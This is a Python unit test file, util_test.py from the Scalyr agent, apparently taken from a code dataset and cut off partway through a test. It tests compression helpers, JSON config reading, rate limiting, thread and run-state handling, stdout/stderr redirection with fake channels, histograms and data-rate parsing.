source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
util_test.py
|
# Copyright 2014 Scalyr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------
#
# author: Steven Czerwinski <czerwin@scalyr.com>
from __future__ import unicode_literals
from __future__ import absolute_import
from scalyr_agent import compat
__author__ = "czerwin@scalyr.com"
from io import open
from scalyr_agent import scalyr_init
scalyr_init()
import sys
import datetime
import os
import tempfile
import threading
import uuid
import mock
from mock import patch, MagicMock
import six
import scalyr_agent.util as scalyr_util
from scalyr_agent.util import (
JsonReadFileException,
RateLimiter,
FakeRunState,
ScriptEscalator,
HistogramTracker,
)
from scalyr_agent.util import (
StoppableThread,
RedirectorServer,
RedirectorClient,
RedirectorError,
)
from scalyr_agent.util import verify_and_get_compress_func
from scalyr_agent.json_lib import JsonObject
from scalyr_agent.test_base import ScalyrTestCase
from scalyr_agent.test_base import skipIf
class TestUtilCompression(ScalyrTestCase):
def setUp(self):
super(TestUtilCompression, self).setUp()
self._data = b"The rain in spain. " * 1000
def test_zlib(self):
"""Successful zlib compression"""
data = self._data
compress = verify_and_get_compress_func("deflate")
self.assertIsNotNone(compress)
import zlib
self.assertEqual(data, zlib.decompress(compress(data)))
def test_bz2(self):
"""Successful bz2 compression"""
data = self._data
compress = verify_and_get_compress_func("bz2")
self.assertIsNotNone(compress)
import bz2
self.assertEqual(data, bz2.decompress(compress(data)))
@skipIf(sys.version_info < (2, 7, 0), "Skipping Python < 2.7")
def test_lz4(self):
data = self._data
compress = verify_and_get_compress_func("lz4")
self.assertIsNotNone(compress)
import lz4.frame as lz4
self.assertEqual(data, lz4.decompress(compress(data)))
@skipIf(sys.version_info < (2, 7, 0), "Skipping Python < 2.7")
def test_zstandard(self):
data = self._data
compress = verify_and_get_compress_func("zstandard")
self.assertIsNotNone(compress)
import zstandard
decompressor = zstandard.ZstdDecompressor()
self.assertEqual(data, decompressor.decompress(compress(data)))
def test_bad_compression_type(self):
"""User enters unsupported compression type"""
self.assertIsNone(verify_and_get_compress_func("bad_compression_type"))
def test_bad_compression_lib_exception_on_import(self):
"""Pretend that import bz2/zlib raises exception"""
def _mock_get_compress_and_decompress_func(
compression_type, compression_level=9
):
raise Exception("Mimic exception when importing compression lib")
@patch(
"scalyr_agent.util.get_compress_and_decompress_func",
new=_mock_get_compress_and_decompress_func,
)
def _test(compression_type):
self.assertIsNone(verify_and_get_compress_func(compression_type))
_test("deflate")
_test("bz2")
_test("lz4")
_test("zstandard")
def test_bad_compression_lib_no_compression(self):
"""Pretend that the zlib/bz2 library compress() method doesn't perform any comnpression"""
def _mock_get_compress_and_decompress_func(
compression_type, compression_level=9
):
m = MagicMock()
# simulate module.compress() method that does not compress input data string
m.compress = lambda data, compression_level=9: data
m.decompress = lambda data: data
return m.compress, m.decompress
@patch(
"scalyr_agent.util.get_compress_and_decompress_func",
new=_mock_get_compress_and_decompress_func,
)
def _test(compression_type):
self.assertIsNone(verify_and_get_compress_func(compression_type))
_test("deflate")
_test("bz2")
_test("lz4")
_test("zstandard")
class TestUtil(ScalyrTestCase):
def setUp(self):
super(TestUtil, self).setUp()
self.__tempdir = tempfile.mkdtemp()
self.__path = os.path.join(self.__tempdir, "testing.json")
def test_read_file_as_json(self):
self.__create_file(self.__path, '{ "a": "hi"}')
value = scalyr_util.read_file_as_json(self.__path)
self.assertEquals(value, {"a": "hi"})
def test_read_config_file_as_json(self):
self.__create_file(self.__path, '{ a: "hi"} // Test')
json_object = scalyr_util.read_config_file_as_json(self.__path)
self.assertEquals(json_object, JsonObject(a="hi"))
def test_read_file_as_json_no_file(self):
self.assertRaises(JsonReadFileException, scalyr_util.read_file_as_json, "foo")
def test_read_file_as_json_with_bad_json(self):
self.__create_file(self.__path, "{ a: hi}")
self.assertRaises(
JsonReadFileException, scalyr_util.read_file_as_json, self.__path
)
def test_read_file_as_json_with_strict_utf8_json(self):
# 2->TODO python3 json libs do not allow serialization with invalid UTF-8.
with open(self.__path, "wb") as f:
f.write(b'{ a: "\x96"}')
self.assertRaises(
JsonReadFileException, scalyr_util.read_file_as_json, self.__path, True
)
def test_atomic_write_dict_as_json_file(self):
info = {"a": "hi"}
scalyr_util.atomic_write_dict_as_json_file(self.__path, self.__path + "~", info)
json_object = scalyr_util.read_file_as_json(self.__path)
self.assertEquals(json_object, info)
def __create_file(self, path, contents):
fp = open(path, "w")
fp.write(contents)
fp.close()
def test_seconds_since_epoch(self):
dt = datetime.datetime(2015, 8, 6, 14, 40, 56)
expected = 1438872056.0
actual = scalyr_util.seconds_since_epoch(dt)
self.assertEquals(expected, actual)
def test_microseconds_since_epoch(self):
dt = datetime.datetime(2015, 8, 6, 14, 40, 56, 123456)
expected = 1438872056123456
actual = scalyr_util.microseconds_since_epoch(dt)
self.assertEquals(expected, actual)
def test_uuid(self):
first = scalyr_util.create_unique_id()
second = scalyr_util.create_unique_id()
self.assertTrue(len(first) > 0)
self.assertTrue(len(second) > 0)
self.assertNotEqual(first, second)
def test_create_uuid3(self):
namespace = uuid.UUID("{aaaaffff-22c7-4d50-92c1-123456781234}")
self.assertEqual(
scalyr_util.create_uuid3(namespace, "test-string"),
uuid.UUID("{72a49a0a-d92e-383c-a88b-2060e372e1af}"),
)
def test_remove_newlines_and_truncate(self):
self.assertEquals(scalyr_util.remove_newlines_and_truncate("hi", 1000), "hi")
self.assertEquals(scalyr_util.remove_newlines_and_truncate("ok then", 2), "ok")
self.assertEquals(
scalyr_util.remove_newlines_and_truncate("o\nk\n", 1000), "o k "
)
self.assertEquals(
scalyr_util.remove_newlines_and_truncate("ok\n\r there", 1000), "ok there"
)
self.assertEquals(
scalyr_util.remove_newlines_and_truncate("ok\n\r there", 6), "ok t"
)
def test_is_list_of_strings_yes(self):
self.assertTrue(scalyr_util.is_list_of_strings(["*", "blah", "dah"]))
def test_is_list_of_strings_no(self):
self.assertFalse(scalyr_util.is_list_of_strings(["*", 3, {"blah": "dah"}]))
def test_is_list_of_strings_none(self):
self.assertFalse(scalyr_util.is_list_of_strings(None))
def test_value_to_bool(self):
self.assertTrue(scalyr_util.value_to_bool(True))
self.assertTrue(scalyr_util.value_to_bool(1))
self.assertFalse(scalyr_util.value_to_bool(0))
self.assertRaises(ValueError, scalyr_util.value_to_bool, 100)
self.assertTrue(scalyr_util.value_to_bool("something"))
self.assertFalse(scalyr_util.value_to_bool("f"))
self.assertFalse(scalyr_util.value_to_bool("False"))
self.assertFalse(scalyr_util.value_to_bool(""))
def test_get_parser_from_config_default(self):
config = {
"something": "something",
"other something": ["thing1", "thing2"],
}
attributes = {"nothing": 0}
self.assertEqual(
scalyr_util.get_parser_from_config(config, attributes, "default_parser"),
"default_parser",
)
def test_get_parser_from_config_hierarchy1(self):
config = {
"something": "something",
"other something": ["thing1", "thing2"],
"parser": "config_parser",
"attributes": {"parser": "config_attributes_parser"},
}
attributes = {
"nothing": 0,
"parser": "attributes_parser",
}
self.assertEqual(
scalyr_util.get_parser_from_config(config, attributes, "default_parser"),
"config_attributes_parser",
)
def test_get_parser_from_config_hierarchy2(self):
config = {
"something": "something",
"other something": ["thing1", "thing2"],
"parser": "config_parser",
"attributes": {},
}
attributes = {
"nothing": 0,
"parser": "attributes_parser",
}
self.assertEqual(
scalyr_util.get_parser_from_config(config, attributes, "default_parser"),
"config_parser",
)
def test_get_parser_from_config_hierarchy3(self):
config = {
"something": "something",
"other something": ["thing1", "thing2"],
"attributes": {},
}
attributes = {
"nothing": 0,
"parser": "attributes_parser",
}
self.assertEqual(
scalyr_util.get_parser_from_config(config, attributes, "default_parser"),
"attributes_parser",
)
def test_get_web_url_from_upload_url(self):
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://agent.scalyr.com"),
"https://www.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://log.scalyr.com"),
"https://www.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://upload.scalyr.com"),
"https://www.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://app.scalyr.com"),
"https://www.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://agent.eu.scalyr.com"),
"https://www.eu.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://log.eu.scalyr.com"),
"https://www.eu.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://upload.eu.scalyr.com"),
"https://www.eu.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://app.eu.scalyr.com"),
"https://www.eu.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://logstaging.scalyr.com"),
"https://logstaging.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://logstaging.eu.scalyr.com"),
"https://logstaging.eu.scalyr.com",
)
class TestRateLimiter(ScalyrTestCase):
def setUp(self):
super(TestRateLimiter, self).setUp()
self.__test_rate = RateLimiter(100, 10, current_time=0)
self.__current_time = 0
self.__last_sleep_amount = -1
def advance_time(self, delta):
self.__current_time += delta
def charge_if_available(self, num_bytes):
return self.__test_rate.charge_if_available(
num_bytes, current_time=self.__current_time
)
def block_until_charge_succeeds(self, num_bytes):
return self.__test_rate.block_until_charge_succeeds(
num_bytes, current_time=self.__current_time
)
def test_basic_use(self):
self.assertTrue(self.charge_if_available(20))
self.assertTrue(self.charge_if_available(80))
self.assertFalse(self.charge_if_available(1))
def test_custom_bucket_size_and_rate(self):
self.__test_rate = RateLimiter(10, 1, current_time=0)
self.assertTrue(self.charge_if_available(10))
self.assertFalse(self.charge_if_available(10))
self.advance_time(1)
self.assertFalse(self.charge_if_available(10))
self.advance_time(5)
self.assertFalse(self.charge_if_available(10))
def test_zero_bucket_fill_rate(self):
self.__test_rate = RateLimiter(100, 0, current_time=0)
self.assertTrue(self.charge_if_available(20))
self.assertTrue(self.charge_if_available(80))
self.assertFalse(self.charge_if_available(1))
self.advance_time(1)
self.assertFalse(self.charge_if_available(20))
self.advance_time(5)
self.assertFalse(self.charge_if_available(20))
def test_refill(self):
self.assertTrue(self.charge_if_available(60))
self.assertFalse(self.charge_if_available(60))
self.advance_time(1)
self.assertFalse(self.charge_if_available(60))
self.advance_time(1)
self.assertTrue(self.charge_if_available(60))
def fake_sleep(self, seconds):
self.__last_sleep_amount = seconds
self.advance_time(seconds)
def test_basic_use_sleep(self):
with mock.patch("scalyr_agent.util.time.sleep", self.fake_sleep):
self.__last_sleep_amount = -1
self.block_until_charge_succeeds(20)
self.assertEqual(self.__last_sleep_amount, -1)
self.block_until_charge_succeeds(80)
self.assertEqual(self.__last_sleep_amount, -1)
self.block_until_charge_succeeds(1)
self.assertEqual(self.__last_sleep_amount, 0.1)
def test_custom_bucket_size_and_rate_sleep(self):
with mock.patch("scalyr_agent.util.time.sleep", self.fake_sleep):
self.__last_sleep_amount = -1
self.__test_rate = RateLimiter(10, 1, current_time=0)
self.block_until_charge_succeeds(10)
self.assertEqual(self.__last_sleep_amount, -1)
self.block_until_charge_succeeds(10)
self.assertEqual(self.__last_sleep_amount, 10)
self.advance_time(15)
self.block_until_charge_succeeds(20)
self.assertEqual(self.__last_sleep_amount, 10)
def test_zero_bucket_fill_rate_sleep(self):
self.__test_rate = RateLimiter(100, 0, current_time=0)
self.assertRaises(ValueError, self.block_until_charge_succeeds, 20)
def test_refill_sleep(self):
with mock.patch("scalyr_agent.util.time.sleep", self.fake_sleep):
self.__last_sleep_amount = -1
self.block_until_charge_succeeds(60)
self.assertEqual(self.__last_sleep_amount, -1)
self.block_until_charge_succeeds(60)
self.assertEqual(self.__last_sleep_amount, 2)
self.advance_time(1)
self.block_until_charge_succeeds(60)
self.assertEqual(self.__last_sleep_amount, 5)
def test_charge_greater_than_bucket_size_sleep(self):
with mock.patch("scalyr_agent.util.time.sleep", self.fake_sleep):
self.__last_sleep_amount = -1
self.__test_rate = RateLimiter(10, 1, current_time=0)
self.block_until_charge_succeeds(20)
self.assertEqual(self.__last_sleep_amount, 10)
class TestRunState(ScalyrTestCase):
def test_basic_use(self):
# We use a FakeRunState for testing just so we do not accidentally sleep.
run_state = FakeRunState()
self.assertTrue(run_state.is_running())
run_state.sleep_but_awaken_if_stopped(1.0)
self.assertEquals(run_state.total_times_slept, 1)
run_state.stop()
self.assertFalse(run_state.is_running())
def test_sleeping_already_stopped(self):
run_state = FakeRunState()
run_state.stop()
run_state.sleep_but_awaken_if_stopped(1.0)
self.assertEquals(run_state.total_times_slept, 0)
def test_callbacks(self):
self.called = False
def on_stop():
self.called = True
run_state = FakeRunState()
run_state.register_on_stop_callback(on_stop)
run_state.stop()
self.assertTrue(self.called)
# Make sure it is immediately invoked if already stopped.
self.called = False
run_state.register_on_stop_callback(on_stop)
self.assertTrue(self.called)
class TestStoppableThread(ScalyrTestCase):
def setUp(self):
super(TestStoppableThread, self).setUp()
self._run_counter = 0
def test_basic_use(self):
# Since the ScalyrTestCase sets the name prefix, we need to set it back to None to get an unmolested name.
StoppableThread.set_name_prefix(None)
test_thread = StoppableThread("Testing", self._run_method)
self.assertEqual(test_thread.getName(), "Testing")
test_thread.start()
test_thread.stop()
self.assertTrue(self._run_counter > 0)
def test_name_prefix(self):
StoppableThread.set_name_prefix("test_name_prefix: ")
test_thread = StoppableThread("Testing", self._run_method)
self.assertEqual(test_thread.getName(), "test_name_prefix: Testing")
test_thread.start()
test_thread.stop()
self.assertTrue(self._run_counter > 0)
def test_name_prefix_with_none(self):
StoppableThread.set_name_prefix("test_name_prefix: ")
test_thread = StoppableThread(target=self._run_method)
self.assertEqual(test_thread.getName(), "test_name_prefix: ")
test_thread.start()
test_thread.stop()
self.assertTrue(self._run_counter > 0)
def test_basic_extending(self):
class TestThread(StoppableThread):
def __init__(self):
self.run_counter = 0
StoppableThread.__init__(self, "Test thread")
def run_and_propagate(self):
self.run_counter += 1
while self._run_state.is_running():
self.run_counter += 1
self._run_state.sleep_but_awaken_if_stopped(0.03)
test_thread = TestThread()
test_thread.start()
test_thread.stop()
self.assertTrue(test_thread.run_counter > 0)
def test_exception(self):
class TestException(Exception):
pass
def throw_an_exception(run_state):
run_state.is_running()
raise TestException()
test_thread = StoppableThread("Testing", throw_an_exception)
test_thread.start()
caught_it = False
try:
test_thread.stop()
except TestException:
caught_it = True
self.assertTrue(caught_it)
def test_is_alive(self):
class TestThread(StoppableThread):
def __init__(self):
self.run_counter = 0
StoppableThread.__init__(self, "Test thread")
def run_and_propagate(self):
while self._run_state.is_running():
self._run_state.sleep_but_awaken_if_stopped(0.03)
test_thread_1 = TestThread()
test_thread_2 = StoppableThread("Testing", self._run_method)
test_threads = [test_thread_1, test_thread_2]
for test_thread in test_threads:
self.assertFalse(test_thread.isAlive())
if six.PY3:
self.assertFalse(test_thread.is_alive())
test_thread.start()
self.assertTrue(test_thread.isAlive())
if six.PY3:
self.assertTrue(test_thread.is_alive())
test_thread.stop()
self.assertFalse(test_thread.isAlive())
if six.PY3:
self.assertFalse(test_thread.is_alive())
def _run_method(self, run_state):
self._run_counter += 1
while run_state.is_running():
self._run_counter += 1
run_state.sleep_but_awaken_if_stopped(0.03)
def test_register_on_stop_callback(self):
self.callback_called = False
def fake_callback():
self.callback_called = True
run_state = scalyr_util.RunState()
run_state.register_on_stop_callback(fake_callback)
run_state.stop()
self.assertTrue(self.callback_called)
def test_remove_on_stop_callback(self):
self.callback_called = False
def fake_callback():
self.callback_called = True
run_state = scalyr_util.RunState()
run_state.register_on_stop_callback(fake_callback)
run_state.remove_on_stop_callback(fake_callback)
run_state.stop()
self.assertFalse(self.callback_called)
class TestScriptEscalator(ScalyrTestCase):
def tearDown(self):
super(TestScriptEscalator, self).tearDown()
if "__main__" in sys.modules:
del sys.modules["__main__"]
def test_is_user_change_required(self):
(test_instance, controller) = self.create_instance("czerwin", "fileA", "steve")
self.assertTrue(test_instance.is_user_change_required())
(test_instance, controller) = self.create_instance(
"czerwin", "fileA", "czerwin"
)
self.assertFalse(test_instance.is_user_change_required())
def test_change_user_and_rerun_script(self):
# NOTE: __main__.__file__ might not be set when running tests under pytests or nosetests
mock_main = mock.Mock()
mock_main.__file__ = "/tmp/file.py"
sys.modules["__main__"] = mock_main
(test_instance, controller) = self.create_instance("czerwin", "fileA", "steve")
self.assertEquals(test_instance.change_user_and_rerun_script("random"), 0)
self.assertEquals(controller.call_count, 1)
self.assertEquals(controller.last_call["user"], "steve")
self.assertEqual(controller.last_call["script_file"], "/tmp/file.py")
def create_instance(self, current_user, config_file, config_owner):
controller = TestScriptEscalator.ControllerMock(
current_user, config_file, config_owner
)
# noinspection PyTypeChecker
return ScriptEscalator(controller, config_file, os.getcwd()), controller
class ControllerMock(object):
def __init__(self, running_user, expected_config_file, config_owner):
self.__running_user = running_user
self.__expected_config_file = expected_config_file
self.__config_owner = config_owner
self.last_call = None
self.call_count = 0
def get_current_user(self):
return self.__running_user
def get_file_owner(self, config_file_path):
assert self.__expected_config_file == config_file_path
if self.__expected_config_file == config_file_path:
return self.__config_owner
else:
return None
def run_as_user(self, user, script_file_path, script_binary, script_args):
self.call_count += 1
self.last_call = {
"user": user,
"script_file": script_file_path,
"script_binary": script_binary,
"script_args": script_args,
}
return 0
class TestRedirectorServer(ScalyrTestCase):
"""Tests the RedirectorServer code using fakes for stdout, stderr and the channel.
"""
def setUp(self):
super(TestRedirectorServer, self).setUp()
# Allows us to watch what bytes are being sent to the client.
self._channel = FakeServerChannel()
# Allows us to write bytes to stdout, stderr without them going to the terminal.
self._sys = FakeSys()
self._server = RedirectorServer(self._channel, sys_impl=self._sys)
def test_sending_str(self):
self._server.start()
# Verify that the server told the channel to accept the next client connection.
self.assertEquals(self._channel.accept_count, 1)
# Simulate writing to stdout.
self._sys.stdout.write("Testing")
# Make sure we wrote a message to the channel
self.assertEquals(self._channel.write_count, 1)
(stream_id, content) = self._parse_sent_bytes(self._channel.last_write)
self.assertEquals(stream_id, 0)
self.assertEquals(content, "Testing")
def test_sending_unicode(self):
self._server.start()
self.assertEquals(self._channel.accept_count, 1)
self._sys.stdout.write("caf\xe9")
self.assertEquals(self._channel.write_count, 1)
(stream_id, content) = self._parse_sent_bytes(self._channel.last_write)
self.assertEquals(stream_id, 0)
self.assertEquals(content, "caf\xe9")
def test_sending_to_stderr(self):
self._server.start()
self.assertEquals(self._channel.accept_count, 1)
self._sys.stderr.write("Testing again")
self.assertEquals(self._channel.write_count, 1)
(stream_id, content) = self._parse_sent_bytes(self._channel.last_write)
self.assertEquals(stream_id, 1)
self.assertEquals(content, "Testing again")
def test_connection_failure(self):
# Set the channel to simulate a connection timeout.
self._channel.timeout_connection = True
caught_it = False
try:
# Make sure that we get an exception.
self._server.start()
except RedirectorError:
caught_it = True
self.assertTrue(caught_it)
def _parse_sent_bytes(self, content):
"""Parses the stream id and the actual content from the encoded content string sent by the server.
@param content: The string sent by the server.
@type content: six.binary_type
@return: A tuple of the stream_id and the actual content encoded in the sent string.
@rtype: (int,six.text_type)
"""
prefix_code = content[0:4]
# 2->TODO struct.pack|unpack in python < 2.7.7 does not allow unicode format string.
code = compat.struct_unpack_unicode("i", prefix_code)[0]
stream_id = code % 2
num_bytes = code >> 1
self.assertEquals(len(content), num_bytes + 4)
decoded_str = content[4:].decode("utf-8")
return stream_id, decoded_str
class TestRedirectorClient(ScalyrTestCase):
"""Test the RedirectorClient by faking out the client channel and also the clock.
"""
def setUp(self):
super(TestRedirectorClient, self).setUp()
self._fake_sys = FakeSys()
# Since the client is an actual other thread that blocks waiting for input from the server, we have to
# simulate the time using a fake clock. That will allow us to wait up the client thread from time to time.
self._fake_clock = scalyr_util.FakeClock()
# The fake channel allows us to insert bytes being sent by the server.
self._client_channel = FakeClientChannel(self._fake_clock)
self._client = RedirectorClient(
self._client_channel, sys_impl=self._fake_sys, fake_clock=self._fake_clock
)
self._client.start()
# Wait until the client thread begins to block for the initial accept from the server.
self._fake_clock.block_until_n_waiting_threads(1)
def tearDown(self):
if self._client is not None:
self._client.stop(wait_on_join=False)
self._fake_clock.advance_time(set_to=59.0)
self._client.join()
def test_receiving_bytes(self):
# Simulate accepting the connection.
self._accept_client_connection()
self._send_to_client(0, "Testing")
# Wait until have bytes written to stdout by the client thread.
self._fake_sys.stdout.wait_for_bytes(1.0)
self.assertEquals(self._fake_sys.stdout.last_write, "Testing")
def test_receiving_unicode(self):
self._accept_client_connection()
self._send_to_client(0, "caf\xe9")
self._fake_sys.stdout.wait_for_bytes(1.0)
self.assertEquals(self._fake_sys.stdout.last_write, "caf\xe9")
def test_connection_timeout(self):
# We advance the time past 60 seconds which is the connection time out.
self._fake_clock.advance_time(set_to=61.0)
got_it = False
try:
# Even though we have not called stop on the thread or the server hasn't closed the connection,
# we should still see the client thread terminate because of the exception it raises.
self._client.join()
except RedirectorError:
got_it = True
self._client = None
self.assertTrue(got_it)
def test_close_from_server(self):
self._accept_client_connection()
self._send_to_client(-1, "")
# Even though we haven't called stop on the client thread, it should still end because the server sent
# the signal to stop/close.
self._client.join()
self._client = None
def test_stopped_during_connection(self):
self._client.stop(wait_on_join=False)
# We have wake all threads so the client thread will notice its thread has been stopped.
self._fake_clock.wake_all_threads()
self._client.join()
self._client = None
def test_stopped_during_reading(self):
self._accept_client_connection()
self._client.stop(wait_on_join=False)
# We have wake all threads so the client thread will notice its thread has been stopped.
self._fake_clock.wake_all_threads()
self._client.join()
self._client = None
def _accept_client_connection(self):
self._client_channel.simulate_server_connect()
def _send_to_client(self, stream_id, content):
if type(content) is six.text_type:
encoded_content = six.text_type(content).encode("utf-8")
else:
encoded_content = content
code = len(encoded_content) * 2 + stream_id
# 2->TODO struct.pack|unpack in python < 2.7.7 does not allow unicode format string.
self._client_channel.simulate_server_write(
compat.struct_pack_unicode("i", code) + encoded_content
)
class TestRedirectionService(ScalyrTestCase):
"""Tests both the RedirectorServer and the RedirectorClient communicating together.
"""
def setUp(self):
super(TestRedirectionService, self).setUp()
self._client_sys = FakeSys()
self._server_sys = FakeSys()
self._fake_clock = scalyr_util.FakeClock()
self._client_channel = FakeClientChannel(self._fake_clock)
self._server_channel = FakeServerChannel(self._client_channel)
self._client = RedirectorClient(
self._client_channel, sys_impl=self._client_sys, fake_clock=self._fake_clock
)
self._server = RedirectorServer(self._server_channel, sys_impl=self._server_sys)
self._client.start()
self._server.start()
def test_end_to_end(self):
self._server_sys.stdout.write("Test full")
self._server.stop()
self._client.stop()
class FakeServerChannel(RedirectorServer.ServerChannel):
"""A mock-like object for the ServerChannel that allows us to see if certain methods were invoked and with
what arguments.
"""
def __init__(self, client_channel=None):
# Gives the counts of the various methods.
self.close_count = 0
self.accept_count = 0
self.write_count = 0
# The last string that was used when invoking `write`.
self.last_write = None
# If set to True, when the server invokes `accept_client`, it will simulate a connection timeout.
self.timeout_connection = False
# If not None, the fake client channel to send the bytes from `write`.
self._client_channel = client_channel
def accept_client(self, timeout=None):
self.accept_count += 1
if not self.timeout_connection and self._client_channel is not None:
self._client_channel.simulate_server_connect()
return not self.timeout_connection
def write(self, content):
self.write_count += 1
self.last_write = content
if self._client_channel is not None:
self._client_channel.simulate_server_write(content)
def close(self):
self.close_count += 1
class FakeClientChannel(object):
"""Fakes out the RedirectorClient.ClientChannel interface.
This allows us to simulate the connection being accepted by the server and bytes being sent by the server.
"""
def __init__(self, fake_clock):
self._lock = threading.Lock()
self._allow_connection = False
self._pending_content = b""
self._fake_clock = fake_clock
def connect(self):
self._lock.acquire()
result = self._allow_connection
self._lock.release()
return result
def peek(self):
self._lock.acquire()
if self._pending_content is not None:
bytes_to_read = len(self._pending_content)
else:
bytes_to_read = 0
self._lock.release()
return bytes_to_read, 0
def read(self, num_bytes_to_read):
self._lock.acquire()
assert num_bytes_to_read <= len(self._pending_content)
result = self._pending_content[0:num_bytes_to_read]
self._pending_content = self._pending_content[num_bytes_to_read:]
self._lock.release()
return result
def close(self):
pass
def simulate_server_connect(self):
self._lock.acquire()
self._allow_connection = True
self._lock.release()
self._simulate_busy_loop_advance()
def simulate_server_write(self, content):
self._lock.acquire()
self._pending_content = b"%s%s" % (self._pending_content, content)
self._lock.release()
self._simulate_busy_loop_advance()
def _simulate_busy_loop_advance(self):
self._fake_clock.advance_time(increment_by=0.4)
class FakeSys(object):
def __init__(self):
self.stdout = FakeSys.FakeFile()
self.stderr = FakeSys.FakeFile()
class FakeFile(object):
def __init__(self):
self._condition = threading.Condition()
self._last_write = None
def write(self, content):
self._condition.acquire()
self._last_write = content
self._condition.notifyAll()
self._condition.release()
@property
def last_write(self):
self._condition.acquire()
result = self._last_write
self._condition.release()
return result
def wait_for_bytes(self, timeout):
self._condition.acquire()
try:
if self._last_write is not None:
return
self._condition.wait(timeout)
finally:
self._condition.release()
class TestHistogramTracker(ScalyrTestCase):
"""Tests the HistogramTracker abstraction.
"""
def setUp(self):
super(TestHistogramTracker, self).setUp()
self._testing = HistogramTracker([10, 25, 50, 100])
def test_count(self):
self.assertEqual(self._testing.count(), 0)
self._testing.add_sample(1)
self._testing.add_sample(11)
self.assertEqual(self._testing.count(), 2)
self._testing.reset()
self.assertEqual(self._testing.count(), 0)
def test_average(self):
self._testing.add_sample(1)
self._testing.add_sample(11)
self.assertAlmostEqual(self._testing.average(), 6.0)
self._testing.reset()
self.assertIsNone(self._testing.average())
self._testing.add_sample(6)
self.assertAlmostEqual(self._testing.average(), 6.0)
def test_min(self):
self._testing.add_sample(1)
self._testing.add_sample(11)
self.assertAlmostEqual(self._testing.min(), 1.0)
self._testing.add_sample(15)
self.assertAlmostEqual(self._testing.min(), 1.0)
self._testing.add_sample(0.5)
self.assertAlmostEqual(self._testing.min(), 0.5)
self._testing.reset()
self.assertIsNone(self._testing.min())
self._testing.add_sample(15)
self.assertAlmostEqual(self._testing.min(), 15.0)
def test_max(self):
self._testing.add_sample(1)
self._testing.add_sample(11)
self.assertAlmostEqual(self._testing.max(), 11.0)
self._testing.add_sample(15)
self.assertAlmostEqual(self._testing.max(), 15.0)
self._testing.add_sample(0.5)
self.assertAlmostEqual(self._testing.max(), 15.0)
self._testing.reset()
self.assertIsNone(self._testing.max())
self._testing.add_sample(0)
self.assertAlmostEqual(self._testing.max(), 0)
def test_buckets(self):
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 0)
self._testing.add_sample(2)
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 1)
self.assertBucketEquals(buckets[0], (1, 2, 10))
self._testing.add_sample(50)
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 2)
self.assertBucketEquals(buckets[0], (1, 2, 10))
self.assertBucketEquals(buckets[1], (1, 50, 100))
self._testing.add_sample(5)
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 2)
self.assertBucketEquals(buckets[0], (2, 2, 10))
self.assertBucketEquals(buckets[1], (1, 50, 100))
self._testing.add_sample(200)
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 3)
self.assertBucketEquals(buckets[0], (2, 2, 10))
self.assertBucketEquals(buckets[1], (1, 50, 100))
self.assertBucketEquals(buckets[2], (1, 100, 200.01))
def test_estimate_percentile(self):
self.assertIsNone(self._testing.estimate_median())
self._testing.add_sample(0)
self._testing.add_sample(3)
self._testing.add_sample(4)
# Since all of the values fall into the first bucket, the estimate of the percentile will be the same for all
# percentiles.
self.assertAlmostEqual(self._testing.estimate_percentile(0.1), 5.0)
self.assertAlmostEqual(self._testing.estimate_percentile(0.5), 5.0)
self.assertAlmostEqual(self._testing.estimate_percentile(1.0), 5.0)
self._testing.add_sample(11)
self._testing.add_sample(12)
self._testing.add_sample(13)
self._testing.add_sample(55)
self.assertAlmostEqual(self._testing.estimate_percentile(0.1), 5.0)
self.assertAlmostEqual(self._testing.estimate_percentile(0.5), 17.5)
self.assertAlmostEqual(self._testing.estimate_percentile(1.0), 75.0)
def test_summarize(self):
self.assertEqual(self._testing.summarize(), "(count=0)")
self._testing.add_sample(2)
self._testing.add_sample(4)
self._testing.add_sample(45)
self._testing.add_sample(200)
self.assertEqual(
self._testing.summarize(),
"(count=4,avg=62.75,min=2.00,max=200.00,median=6.00)",
)
def assertBucketEquals(self, first, second):
self.assertEquals(first[0], second[0], msg="The counts do not equal")
self.assertAlmostEquals(
first[1], second[1], msg="The lower bounds do not equal"
)
self.assertAlmostEquals(
first[2], second[2], msg="The upper bounds do not equal"
)
def _buckets_to_list(self):
result = []
for count, lower, upper in self._testing.buckets():
result.append((count, lower, upper))
return result
class TestParseValueWithRate(ScalyrTestCase):
def test_numerators(self):
self.assertEqual(100, scalyr_util.parse_data_rate_string("100 B/s"))
self.assertEqual(100 * 1000, scalyr_util.parse_data_rate_string("100 kB/s"))
self.assertEqual(
100 * 1000 * 1000, scalyr_util.parse_data_rate_string("100 mB/s")
)
self.assertEqual(
100 * 1000 * 1000 * 1000, scalyr_util.parse_data_rate_string("100 gB/s")
)
self.assertEqual(
100 * 1000 * 1000 * 1000 * 1000,
scalyr_util.parse_data_rate_string("100 tB/s"),
)
self.assertEqual(100 * 1024, scalyr_util.parse_data_rate_string("100 kiB/s"))
self.assertEqual(
100 * 1024 * 1024, scalyr_util.parse_data_rate_string("100 miB/s")
)
self.assertEqual(
100 * 1024 * 1024 * 1024, scalyr_util.parse_data_rate_string("100 giB/s")
)
self.assertEqual(
100 * 1024 * 1024 * 1024 * 1024,
